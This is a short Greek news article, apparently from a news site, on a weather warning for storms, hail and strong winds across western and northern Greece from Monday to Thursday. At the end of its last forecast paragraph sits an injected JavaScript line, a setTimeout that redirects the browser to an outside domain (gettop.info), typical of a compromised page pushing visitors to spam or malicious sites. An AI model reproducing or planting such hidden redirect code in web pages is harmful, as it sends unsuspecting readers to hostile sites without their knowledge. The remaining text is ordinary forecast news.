Έρχονται καταιγίδες, χαλάζι και θυελλώδεις άνεμοι

0
7

 

Αλλάζει το σκηνικό του καιρού καθώς αναμένονται ισχυρές βροχές και καταιγίδες, οι οποίες πιθανώς θα συνοδεύονται τοπικά από χαλαζοπτώσεις, και τους θυελλώδεις ανέμους (6 με 8 και πιθανώς πρόσκαιρα 9 μποφόρ). Τα έκτακτα καιρικάφαινόμενα όπως ενημερώνει η ΕΜΥ θα ξεκινήσουν από σήμερα, Δευτέρα και από τα βορειοδυτικά.

Από τα φαινόμενα θα επηρεαστούν, αύριο, Τρίτη τα νησιά του Ιονίου, η Ήπειρος, η δυτική και η κεντρική Στερεά, η βορειοδυτική Πελοπόννησος και πρόσκαιρα στην αρχή της ημέρας η δυτική και κεντρική Μακεδονία και από το απόγευμα η ανατολική Μακεδονία και Θρακη.

Μεθαύριο, Τετάρτη, τα νησιά του Ιουνίου, η Ήπειρος, η δυτική και η κεντρική Στερεά, η δυτική Πελοπόννησος, η Θεσσαλία, η Μακεδονία, η Θράκη και από το μεσημέρι σταδιακά και η υπόλοιπη χώρα.

Παρά τη βαθμιαία εξασθένηση των φαινομένων από το βράδυ της Τετάρτης και από τα δυτικά, η Θράκη και τα νησιά του ανατολικού Αιγαίου και τα Δωδεκάνησα πιθανώς θα επηρεάζονται μέχρι τις πρώτες πρωινές ώρες της Πέμπτης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here